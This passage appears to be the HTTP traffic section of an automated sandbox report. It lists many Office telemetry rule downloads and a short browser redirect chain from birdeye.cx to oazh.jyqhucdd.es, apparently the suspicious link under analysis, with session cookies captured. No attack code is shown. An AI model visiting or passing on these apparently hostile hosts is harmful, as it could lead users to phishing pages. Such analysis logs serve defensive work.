              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /ionvrg HTTP/1.1Host: birdeye.cxConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /Yx6Is/ HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oazh.jyqhucdd.es/Yx6Is/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRBRjE2R212bW8yQVdYcWsrY2M4ekE9PSIsInZhbHVlIjoiVlNtbE1NRGdsMWowWFM3WFp1R3o5QWxtMHhjcDVhT3pIOUxsLzQvb1ZidWdrRFZWQVVNalVBakxwS0k4M1V4R3YrTVNNUkJ5akpQOWY2Q1FzSFJWM0Qybm1RdmR2S1hoeVluV2plbXNzcWFpVUtXL3I1bnI1cFVrc05TS3Zhd2ciLCJtYWMiOiI2YzQ2OTcyNmNlYWMyYWFjZWQ1NTlkYjYzZTA4NmEzNjRlNGJkYzI0NmJlMjMzYzdkNGNhYjk1MDNlNTA2YTNlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5YeUFzNmpZNVc4U0xjMWNDWUpKY1E9PSIsInZhbHVlIjoiMVQ1NGZlQVRHVlRBM21ndVVST3ByeGt1dnFvRGtBOWRHVU9ISXpDN2JlRDJJK3lRYjM5UkoxRUZkbmlRU0dyQkE2MmV4Z2x0SUJRNjdlTkFXNzFmT044MlFaM2VtNmZ3dFIzdzgwNmNXbDFUQmtNR3h6UXQ1S1FXOVVpNFc5Z3UiLCJtYWMiOiI5YTkwOGRmYmNjZmMzZjljMzcyMDhhOGFkNzBjYWJlNjIwMWYyYWFlNzVhMmFhNmFmNjZkNWQ0M2IxOTE2MGU3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
